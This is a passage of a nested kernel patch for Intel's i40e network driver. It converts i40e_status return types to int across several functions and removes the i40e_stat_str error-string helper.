+ 	return status;
+ }
+ 
+-i40e_status
++int
+ i40e_asq_send_command_v2(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 			 void *buff, /* can be NULL */ u16  buff_size,
+ 			 struct i40e_asq_cmd_details *cmd_details,
+@@ -1084,14 +1084,14 @@ void i40e_fill_default_direct_cmd_desc(struct i40e_aq_desc *desc,
+  *  the contents through e.  It can also return how many events are
+  *  left to process through 'pending'
+  **/
+-i40e_status i40e_clean_arq_element(struct i40e_hw *hw,
+-					     struct i40e_arq_event_info *e,
+-					     u16 *pending)
++int i40e_clean_arq_element(struct i40e_hw *hw,
++			   struct i40e_arq_event_info *e,
++			   u16 *pending)
+ {
+-	i40e_status ret_code = 0;
+ 	u16 ntc = hw->aq.arq.next_to_clean;
+ 	struct i40e_aq_desc *desc;
+ 	struct i40e_dma_mem *bi;
++	int ret_code = 0;
+ 	u16 desc_idx;
+ 	u16 datalen;
+ 	u16 flags;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_alloc.h b/drivers/net/ethernet/intel/i40e/i40e_alloc.h
+index cb8689222c8b7..a6c9a9e343d11 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_alloc.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_alloc.h
+@@ -20,16 +20,16 @@ enum i40e_memory_type {
+ };
+ 
+ /* prototype for functions used for dynamic memory allocation */
+-i40e_status i40e_allocate_dma_mem(struct i40e_hw *hw,
+-					    struct i40e_dma_mem *mem,
+-					    enum i40e_memory_type type,
+-					    u64 size, u32 alignment);
+-i40e_status i40e_free_dma_mem(struct i40e_hw *hw,
+-					struct i40e_dma_mem *mem);
+-i40e_status i40e_allocate_virt_mem(struct i40e_hw *hw,
+-					     struct i40e_virt_mem *mem,
+-					     u32 size);
+-i40e_status i40e_free_virt_mem(struct i40e_hw *hw,
+-					 struct i40e_virt_mem *mem);
++int i40e_allocate_dma_mem(struct i40e_hw *hw,
++			  struct i40e_dma_mem *mem,
++			  enum i40e_memory_type type,
++			  u64 size, u32 alignment);
++int i40e_free_dma_mem(struct i40e_hw *hw,
++		      struct i40e_dma_mem *mem);
++int i40e_allocate_virt_mem(struct i40e_hw *hw,
++			   struct i40e_virt_mem *mem,
++			   u32 size);
++int i40e_free_virt_mem(struct i40e_hw *hw,
++		       struct i40e_virt_mem *mem);
+ 
+ #endif /* _I40E_ALLOC_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_client.c b/drivers/net/ethernet/intel/i40e/i40e_client.c
+index 10d7a982a5b9b..8bcb98b85e3d9 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_client.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_client.c
+@@ -541,7 +541,7 @@ static int i40e_client_virtchnl_send(struct i40e_info *ldev,
+ {
+ 	struct i40e_pf *pf = ldev->pf;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status err;
++	int err;
+ 
+ 	err = i40e_aq_send_msg_to_vf(hw, vf_id, VIRTCHNL_OP_IWARP,
+ 				     0, msg, len, NULL);
+@@ -674,7 +674,7 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	struct i40e_vsi_context ctxt;
+ 	bool update = true;
+-	i40e_status err;
++	int err;
+ 
+ 	/* TODO: for now do not allow setting VF's VSI setting */
+ 	if (is_vf)
+@@ -686,8 +686,8 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 	ctxt.flags = I40E_AQ_VSI_TYPE_PF;
+ 	if (err) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++			 "couldn't get PF vsi config, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw,
+ 				     pf->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -714,8 +714,8 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 		err = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 		if (err) {
+ 			dev_info(&pf->pdev->dev,
+-				 "update VSI ctxt for PE failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, err),
++				 "update VSI ctxt for PE failed, err %d aq_err %s\n",
++				 err,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 		}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_common.c b/drivers/net/ethernet/intel/i40e/i40e_common.c
+index 4f01e2a6b6bbf..82e06272158df 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_common.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_common.c
+@@ -14,9 +14,9 @@
+  * This function sets the mac type of the adapter based on the
+  * vendor ID and device ID stored in the hw structure.
+  **/
+-i40e_status i40e_set_mac_type(struct i40e_hw *hw)
++int i40e_set_mac_type(struct i40e_hw *hw)
+ {
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	if (hw->vendor_id == PCI_VENDOR_ID_INTEL) {
+ 		switch (hw->device_id) {
+@@ -124,154 +124,6 @@ const char *i40e_aq_str(struct i40e_hw *hw, enum i40e_admin_queue_err aq_err)
+ 	return hw->err_str;
+ }
+ 
+-/**
+- * i40e_stat_str - convert status err code to a string
+- * @hw: pointer to the HW structure
+- * @stat_err: the status error code to convert
+- **/
+-const char *i40e_stat_str(struct i40e_hw *hw, i40e_status stat_err)
+-{
+-	switch (stat_err) {
+-	case 0:
+-		return "OK";
+-	case I40E_ERR_NVM:
+-		return "I40E_ERR_NVM";
+-	case I40E_ERR_NVM_CHECKSUM:
+-		return "I40E_ERR_NVM_CHECKSUM";
+-	case I40E_ERR_PHY:
+-		return "I40E_ERR_PHY";
+-	case I40E_ERR_CONFIG:
+-		return "I40E_ERR_CONFIG";
+-	case I40E_ERR_PARAM:
+-		return "I40E_ERR_PARAM";
+-	case I40E_ERR_MAC_TYPE:
+-		return "I40E_ERR_MAC_TYPE";
+-	case I40E_ERR_UNKNOWN_PHY:
+-		return "I40E_ERR_UNKNOWN_PHY";
+-	case I40E_ERR_LINK_SETUP:
+-		return "I40E_ERR_LINK_SETUP";
+-	case I40E_ERR_ADAPTER_STOPPED:
+-		return "I40E_ERR_ADAPTER_STOPPED";
+-	case I40E_ERR_INVALID_MAC_ADDR:
+-		return "I40E_ERR_INVALID_MAC_ADDR";
+-	case I40E_ERR_DEVICE_NOT_SUPPORTED:
+-		return "I40E_ERR_DEVICE_NOT_SUPPORTED";
+-	case I40E_ERR_PRIMARY_REQUESTS_PENDING:
+-		return "I40E_ERR_PRIMARY_REQUESTS_PENDING";
+-	case I40E_ERR_INVALID_LINK_SETTINGS:
+-		return "I40E_ERR_INVALID_LINK_SETTINGS";
+-	case I40E_ERR_AUTONEG_NOT_COMPLETE:
+-		return "I40E_ERR_AUTONEG_NOT_COMPLETE";
+-	case I40E_ERR_RESET_FAILED:
+-		return "I40E_ERR_RESET_FAILED";
+-	case I40E_ERR_SWFW_SYNC:
+-		return "I40E_ERR_SWFW_SYNC";
+-	case I40E_ERR_NO_AVAILABLE_VSI:
+-		return "I40E_ERR_NO_AVAILABLE_VSI";
+-	case I40E_ERR_NO_MEMORY:
+-		return "I40E_ERR_NO_MEMORY";
+-	case I40E_ERR_BAD_PTR:
+-		return "I40E_ERR_BAD_PTR";
+-	case I40E_ERR_RING_FULL:
+-		return "I40E_ERR_RING_FULL";
+-	case I40E_ERR_INVALID_PD_ID:
+-		return "I40E_ERR_INVALID_PD_ID";
+-	case I40E_ERR_INVALID_QP_ID:
+-		return "I40E_ERR_INVALID_QP_ID";
+-	case I40E_ERR_INVALID_CQ_ID:
+-		return "I40E_ERR_INVALID_CQ_ID";
+-	case I40E_ERR_INVALID_CEQ_ID:
+-		return "I40E_ERR_INVALID_CEQ_ID";
+-	case I40E_ERR_INVALID_AEQ_ID:
+-		return "I40E_ERR_INVALID_AEQ_ID";
+-	case I40E_ERR_INVALID_SIZE:
+-		return "I40E_ERR_INVALID_SIZE";
+-	case I40E_ERR_INVALID_ARP_INDEX:
+-		return "I40E_ERR_INVALID_ARP_INDEX";
+-	case I40E_ERR_INVALID_FPM_FUNC_ID:
+-		return "I40E_ERR_INVALID_FPM_FUNC_ID";
+-	case I40E_ERR_QP_INVALID_MSG_SIZE:
+-		return "I40E_ERR_QP_INVALID_MSG_SIZE";
+-	case I40E_ERR_QP_TOOMANY_WRS_POSTED:
+-		return "I40E_ERR_QP_TOOMANY_WRS_POSTED";
+-	case I40E_ERR_INVALID_FRAG_COUNT:
+-		return "I40E_ERR_INVALID_FRAG_COUNT";
+-	case I40E_ERR_QUEUE_EMPTY:
+-		return "I40E_ERR_QUEUE_EMPTY";
+-	case I40E_ERR_INVALID_ALIGNMENT:
+-		return "I40E_ERR_INVALID_ALIGNMENT";
+-	case I40E_ERR_FLUSHED_QUEUE:
+-		return "I40E_ERR_FLUSHED_QUEUE";
+-	case I40E_ERR_INVALID_PUSH_PAGE_INDEX:
+-		return "I40E_ERR_INVALID_PUSH_PAGE_INDEX";
+-	case I40E_ERR_INVALID_IMM_DATA_SIZE:
+-		return "I40E_ERR_INVALID_IMM_DATA_SIZE";
+-	case I40E_ERR_TIMEOUT:
+-		return "I40E_ERR_TIMEOUT";
+-	case I40E_ERR_OPCODE_MISMATCH:
+-		return "I40E_ERR_OPCODE_MISMATCH";
+-	case I40E_ERR_CQP_COMPL_ERROR:
+-		return "I40E_ERR_CQP_COMPL_ERROR";
+-	case I40E_ERR_INVALID_VF_ID:
+-		return "I40E_ERR_INVALID_VF_ID";
+-	case I40E_ERR_INVALID_HMCFN_ID:
+-		return "I40E_ERR_INVALID_HMCFN_ID";
+-	case I40E_ERR_BACKING_PAGE_ERROR:
+-		return "I40E_ERR_BACKING_PAGE_ERROR";
+-	case I40E_ERR_NO_PBLCHUNKS_AVAILABLE:
+-		return "I40E_ERR_NO_PBLCHUNKS_AVAILABLE";
+-	case I40E_ERR_INVALID_PBLE_INDEX:
+-		return "I40E_ERR_INVALID_PBLE_INDEX";
+-	case I40E_ERR_INVALID_SD_INDEX:
+-		return "I40E_ERR_INVALID_SD_INDEX";
+-	case I40E_ERR_INVALID_PAGE_DESC_INDEX:
+-		return "I40E_ERR_INVALID_PAGE_DESC_INDEX";
+-	case I40E_ERR_INVALID_SD_TYPE:
+-		return "I40E_ERR_INVALID_SD_TYPE";
+-	case I40E_ERR_MEMCPY_FAILED:
+-		return "I40E_ERR_MEMCPY_FAILED";
+-	case I40E_ERR_INVALID_HMC_OBJ_INDEX:
+-		return "I40E_ERR_INVALID_HMC_OBJ_INDEX";
+-	case I40E_ERR_INVALID_HMC_OBJ_COUNT:
+-		return "I40E_ERR_INVALID_HMC_OBJ_COUNT";
+-	case I40E_ERR_INVALID_SRQ_ARM_LIMIT:
+-		return "I40E_ERR_INVALID_SRQ_ARM_LIMIT";
+-	case I40E_ERR_SRQ_ENABLED:
+-		return "I40E_ERR_SRQ_ENABLED";
+-	case I40E_ERR_ADMIN_QUEUE_ERROR:
+-		return "I40E_ERR_ADMIN_QUEUE_ERROR";
+-	case I40E_ERR_ADMIN_QUEUE_TIMEOUT:
+-		return "I40E_ERR_ADMIN_QUEUE_TIMEOUT";
+-	case I40E_ERR_BUF_TOO_SHORT:
+-		return "I40E_ERR_BUF_TOO_SHORT";
+-	case I40E_ERR_ADMIN_QUEUE_FULL:
+-		return "I40E_ERR_ADMIN_QUEUE_FULL";
+-	case I40E_ERR_ADMIN_QUEUE_NO_WORK:
+-		return "I40E_ERR_ADMIN_QUEUE_NO_WORK";
+-	case I40E_ERR_BAD_IWARP_CQE:
+-		return "I40E_ERR_BAD_IWARP_CQE";
+-	case I40E_ERR_NVM_BLANK_MODE:
+-		return "I40E_ERR_NVM_BLANK_MODE";
+-	case I40E_ERR_NOT_IMPLEMENTED:
+-		return "I40E_ERR_NOT_IMPLEMENTED";
+-	case I40E_ERR_PE_DOORBELL_NOT_ENABLED:
+-		return "I40E_ERR_PE_DOORBELL_NOT_ENABLED";
+-	case I40E_ERR_DIAG_TEST_FAILED:
+-		return "I40E_ERR_DIAG_TEST_FAILED";
+-	case I40E_ERR_NOT_READY:
+-		return "I40E_ERR_NOT_READY";
+-	case I40E_NOT_SUPPORTED:
+-		return "I40E_NOT_SUPPORTED";
+-	case I40E_ERR_FIRMWARE_API_VERSION:
+-		return "I40E_ERR_FIRMWARE_API_VERSION";
+-	case I40E_ERR_ADMIN_QUEUE_CRITICAL_ERROR:
+-		return "I40E_ERR_ADMIN_QUEUE_CRITICAL_ERROR";
+-	}
+-
+-	snprintf(hw->err_str, sizeof(hw->err_str), "%d", stat_err);
+-	return hw->err_str;
+-}
+-
+ /**
+  * i40e_debug_aq
+  * @hw: debug mask related to admin queue
+@@ -355,13 +207,13 @@ bool i40e_check_asq_alive(struct i40e_hw *hw)
+  * Tell the Firmware that we're shutting down the AdminQ and whether
+  * or not the driver is unloading as well.
+  **/
+-i40e_status i40e_aq_queue_shutdown(struct i40e_hw *hw,
+-					     bool unloading)
++int i40e_aq_queue_shutdown(struct i40e_hw *hw,
++			   bool unloading)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_queue_shutdown *cmd =
+ 		(struct i40e_aqc_queue_shutdown *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_queue_shutdown);
+@@ -384,15 +236,15 @@ i40e_status i40e_aq_queue_shutdown(struct i40e_hw *hw,
+  *
+  * Internal function to get or set RSS look up table
+  **/
+-static i40e_status i40e_aq_get_set_rss_lut(struct i40e_hw *hw,
+-					   u16 vsi_id, bool pf_lut,
+-					   u8 *lut, u16 lut_size,
+-					   bool set)
++static int i40e_aq_get_set_rss_lut(struct i40e_hw *hw,
++				   u16 vsi_id, bool pf_lut,
++				   u8 *lut, u16 lut_size,
++				   bool set)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_set_rss_lut *cmd_resp =
+ 		   (struct i40e_aqc_get_set_rss_lut *)&desc.params.raw;
++	int status;
+ 
+ 	if (set)
+ 		i40e_fill_default_direct_cmd_desc(&desc,
+@@ -437,8 +289,8 @@ static i40e_status i40e_aq_get_set_rss_lut(struct i40e_hw *hw,
+  *
+  * get the RSS lookup table, PF or VSI type
+  **/
+-i40e_status i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+-				bool pf_lut, u8 *lut, u16 lut_size)
++int i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 vsi_id,
++			bool pf_lut, u8 *lut, u16 lut_size)
+ {
+ 	return i40e_aq_get_set_rss_lut(hw, vsi_id, pf_lut, lut, lut_size,
+ 				       false);
+@@ -454,8 +306,8 @@ i40e_status i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+  *
+  * set the RSS lookup table, PF or VSI type
+  **/
+-i40e_status i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+-				bool pf_lut, u8 *lut, u16 lut_size)
++int i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 vsi_id,
++			bool pf_lut, u8 *lut, u16 lut_size)
+ {
+ 	return i40e_aq_get_set_rss_lut(hw, vsi_id, pf_lut, lut, lut_size, true);
+ }
+@@ -469,16 +321,16 @@ i40e_status i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+  *
+  * get the RSS key per VSI
+  **/
+-static i40e_status i40e_aq_get_set_rss_key(struct i40e_hw *hw,
+-				      u16 vsi_id,
+-				      struct i40e_aqc_get_set_rss_key_data *key,
+-				      bool set)
++static int i40e_aq_get_set_rss_key(struct i40e_hw *hw,
++				   u16 vsi_id,
++				   struct i40e_aqc_get_set_rss_key_data *key,
++				   bool set)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_set_rss_key *cmd_resp =
+ 			(struct i40e_aqc_get_set_rss_key *)&desc.params.raw;
+ 	u16 key_size = sizeof(struct i40e_aqc_get_set_rss_key_data);
++	int status;
+ 
+ 	if (set)
+ 		i40e_fill_default_direct_cmd_desc(&desc,
+@@ -509,9 +361,9 @@ static i40e_status i40e_aq_get_set_rss_key(struct i40e_hw *hw,
+  * @key: pointer to key info struct
+  *
+  **/
+-i40e_status i40e_aq_get_rss_key(struct i40e_hw *hw,
+-				u16 vsi_id,
+-				struct i40e_aqc_get_set_rss_key_data *key)
++int i40e_aq_get_rss_key(struct i40e_hw *hw,
++			u16 vsi_id,
++			struct i40e_aqc_get_set_rss_key_data *key)
+ {
+ 	return i40e_aq_get_set_rss_key(hw, vsi_id, key, false);
+ }
+@@ -524,9 +376,9 @@ i40e_status i40e_aq_get_rss_key(struct i40e_hw *hw,
+  *
+  * set the RSS key per VSI
+  **/
+-i40e_status i40e_aq_set_rss_key(struct i40e_hw *hw,
+-				u16 vsi_id,
+-				struct i40e_aqc_get_set_rss_key_data *key)
++int i40e_aq_set_rss_key(struct i40e_hw *hw,
++			u16 vsi_id,
++			struct i40e_aqc_get_set_rss_key_data *key)
+ {
+ 	return i40e_aq_get_set_rss_key(hw, vsi_id, key, true);
+ }
+@@ -796,10 +648,10 @@ struct i40e_rx_ptype_decoded i40e_ptype_lookup[BIT(8)] = {
+  * hw_addr, back, device_id, vendor_id, subsystem_device_id,
+  * subsystem_vendor_id, and revision_id
+  **/
+-i40e_status i40e_init_shared_code(struct i40e_hw *hw)
++int i40e_init_shared_code(struct i40e_hw *hw)
+ {
+-	i40e_status status = 0;
+ 	u32 port, ari, func_rid;
++	int status = 0;
+ 
+ 	i40e_set_mac_type(hw);
+ 
+@@ -836,15 +688,16 @@ i40e_status i40e_init_shared_code(struct i40e_hw *hw)
+  * @addrs: the requestor's mac addr store
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-static i40e_status i40e_aq_mac_address_read(struct i40e_hw *hw,
+-				   u16 *flags,
+-				   struct i40e_aqc_mac_address_read_data *addrs,
+-				   struct i40e_asq_cmd_details *cmd_details)
++static int
++i40e_aq_mac_address_read(struct i40e_hw *hw,
++			 u16 *flags,
++			 struct i40e_aqc_mac_address_read_data *addrs,
++			 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_mac_address_read *cmd_data =
+ 		(struct i40e_aqc_mac_address_read *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_mac_address_read);
+ 	desc.flags |= cpu_to_le16(I40E_AQ_FLAG_BUF);
+@@ -863,14 +716,14 @@ static i40e_status i40e_aq_mac_address_read(struct i40e_hw *hw,
+  * @mac_addr: address to write
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_mac_address_write(struct i40e_hw *hw,
+-				    u16 flags, u8 *mac_addr,
+-				    struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_mac_address_write(struct i40e_hw *hw,
++			      u16 flags, u8 *mac_addr,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_mac_address_write *cmd_data =
+ 		(struct i40e_aqc_mac_address_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_mac_address_write);
+@@ -893,11 +746,11 @@ i40e_status i40e_aq_mac_address_write(struct i40e_hw *hw,
+  *
+  * Reads the adapter's MAC address from register
+  **/
+-i40e_status i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
++int i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
+ {
+ 	struct i40e_aqc_mac_address_read_data addrs;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	status = i40e_aq_mac_address_read(hw, &flags, &addrs, NULL);
+ 
+@@ -914,11 +767,11 @@ i40e_status i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
+  *
+  * Reads the adapter's Port MAC address
+  **/
+-i40e_status i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
++int i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
+ {
+ 	struct i40e_aqc_mac_address_read_data addrs;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	status = i40e_aq_mac_address_read(hw, &flags, &addrs, NULL);
+ 	if (status)
+@@ -972,13 +825,13 @@ void i40e_pre_tx_queue_cfg(struct i40e_hw *hw, u32 queue, bool enable)
+  *
+  *  Reads the part number string from the EEPROM.
+  **/
+-i40e_status i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
+-				 u32 pba_num_size)
++int i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
++			 u32 pba_num_size)
+ {
+-	i40e_status status = 0;
+ 	u16 pba_word = 0;
+ 	u16 pba_size = 0;
+ 	u16 pba_ptr = 0;
++	int status = 0;
+ 	u16 i = 0;
+ 
+ 	status = i40e_read_nvm_word(hw, I40E_SR_PBA_FLAGS, &pba_word);
+@@ -1087,8 +940,8 @@ static enum i40e_media_type i40e_get_media_type(struct i40e_hw *hw)
+  * @hw: pointer to the hardware structure
+  * @retry_limit: how many times to retry before failure
+  **/
+-static i40e_status i40e_poll_globr(struct i40e_hw *hw,
+-				   u32 retry_limit)
++static int i40e_poll_globr(struct i40e_hw *hw,
++			   u32 retry_limit)
+ {
+ 	u32 cnt, reg = 0;
+ 
+@@ -1114,7 +967,7 @@ static i40e_status i40e_poll_globr(struct i40e_hw *hw,
+  * Assuming someone else has triggered a global reset,
+  * assure the global reset is complete and then reset the PF
+  **/
+-i40e_status i40e_pf_reset(struct i40e_hw *hw)
++int i40e_pf_reset(struct i40e_hw *hw)
+ {
+ 	u32 cnt = 0;
+ 	u32 cnt1 = 0;
+@@ -1453,15 +1306,16 @@ void i40e_led_set(struct i40e_hw *hw, u32 mode, bool blink)
+  *
+  * Returns the various PHY abilities supported on the Port.
+  **/
+-i40e_status i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
+-			bool qualified_modules, bool report_init,
+-			struct i40e_aq_get_phy_abilities_resp *abilities,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
++			     bool qualified_modules, bool report_init,
++			     struct i40e_aq_get_phy_abilities_resp *abilities,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+-	struct i40e_aq_desc desc;
+-	i40e_status status;
+ 	u16 abilities_size = sizeof(struct i40e_aq_get_phy_abilities_resp);
+ 	u16 max_delay = I40E_MAX_PHY_TIMEOUT, total_delay = 0;
++	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	if (!abilities)
+ 		return I40E_ERR_PARAM;
+@@ -1532,14 +1386,14 @@ i40e_status i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
+  * of the PHY Config parameters. This status will be indicated by the
+  * command response.
+  **/
+-enum i40e_status_code i40e_aq_set_phy_config(struct i40e_hw *hw,
+-				struct i40e_aq_set_phy_config *config,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_config(struct i40e_hw *hw,
++			   struct i40e_aq_set_phy_config *config,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aq_set_phy_config *cmd =
+ 			(struct i40e_aq_set_phy_config *)&desc.params.raw;
+-	enum i40e_status_code status;
++	int status;
+ 
+ 	if (!config)
+ 		return I40E_ERR_PARAM;
+@@ -1554,7 +1408,7 @@ enum i40e_status_code i40e_aq_set_phy_config(struct i40e_hw *hw,
+ 	return status;
+ }
+ 
+-static noinline_for_stack enum i40e_status_code
++static noinline_for_stack int
+ i40e_set_fc_status(struct i40e_hw *hw,
+ 		   struct i40e_aq_get_phy_abilities_resp *abilities,
+ 		   bool atomic_restart)
+@@ -1612,11 +1466,11 @@ i40e_set_fc_status(struct i40e_hw *hw,
+  *
+  * Set the requested flow control mode using set_phy_config.
+  **/
+-enum i40e_status_code i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
+-				  bool atomic_restart)
++int i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
++		bool atomic_restart)
+ {
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+-	enum i40e_status_code status;
++	int status;
+ 
+ 	*aq_failures = 0x0;
+ 
+@@ -1655,13 +1509,13 @@ enum i40e_status_code i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
+  *
+  * Tell the firmware that the driver is taking over from PXE
+  **/
+-i40e_status i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_clear_pxe *cmd =
+ 		(struct i40e_aqc_clear_pxe *)&desc.params.raw;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_clear_pxe_mode);
+@@ -1683,14 +1537,14 @@ i40e_status i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
+  *
+  * Sets up the link and restarts the Auto-Negotiation over the link.
+  **/
+-i40e_status i40e_aq_set_link_restart_an(struct i40e_hw *hw,
+-					bool enable_link,
+-					struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_link_restart_an(struct i40e_hw *hw,
++				bool enable_link,
++				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_link_restart_an *cmd =
+ 		(struct i40e_aqc_set_link_restart_an *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_link_restart_an);
+@@ -1715,17 +1569,17 @@ i40e_status i40e_aq_set_link_restart_an(struct i40e_hw *hw,
+  *
+  * Returns the link status of the adapter.
+  **/
+-i40e_status i40e_aq_get_link_info(struct i40e_hw *hw,
+-				bool enable_lse, struct i40e_link_status *link,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_link_info(struct i40e_hw *hw,
++			  bool enable_lse, struct i40e_link_status *link,
++			  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_link_status *resp =
+ 		(struct i40e_aqc_get_link_status *)&desc.params.raw;
+ 	struct i40e_link_status *hw_link_info = &hw->phy.link_info;
+-	i40e_status status;
+ 	bool tx_pause, rx_pause;
+ 	u16 command_flags;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_get_link_status);
+ 
+@@ -1811,14 +1665,14 @@ aq_get_link_info_exit:
+  *
+  * Set link interrupt mask.
+  **/
+-i40e_status i40e_aq_set_phy_int_mask(struct i40e_hw *hw,
+-				     u16 mask,
+-				     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_int_mask(struct i40e_hw *hw,
++			     u16 mask,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_phy_int_mask *cmd =
+ 		(struct i40e_aqc_set_phy_int_mask *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_phy_int_mask);
+@@ -1838,13 +1692,13 @@ i40e_status i40e_aq_set_phy_int_mask(struct i40e_hw *hw,
+  *
+  * Reset the external PHY.
+  **/
+-i40e_status i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
+-				  struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
++			  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_phy_debug *cmd =
+ 		(struct i40e_aqc_set_phy_debug *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_phy_debug);
+@@ -1879,9 +1733,9 @@ static bool i40e_is_aq_api_ver_ge(struct i40e_adminq_info *aq, u16 maj,
+  *
+  * Add a VSI context to the hardware.
+ **/
+-i40e_status i40e_aq_add_vsi(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_vsi(struct i40e_hw *hw,
++		    struct i40e_vsi_context *vsi_ctx,
++		    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_get_update_vsi *cmd =
+@@ -1889,7 +1743,7 @@ i40e_status i40e_aq_add_vsi(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_get_update_vsi_completion *resp =
+ 		(struct i40e_aqc_add_get_update_vsi_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_add_vsi);
+@@ -1923,15 +1777,15 @@ aq_add_vsi_exit:
+  * @seid: vsi number
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_default_vsi(struct i40e_hw *hw,
+-				    u16 seid,
+-				    struct i40e_asq_cmd_details *cmd_details)
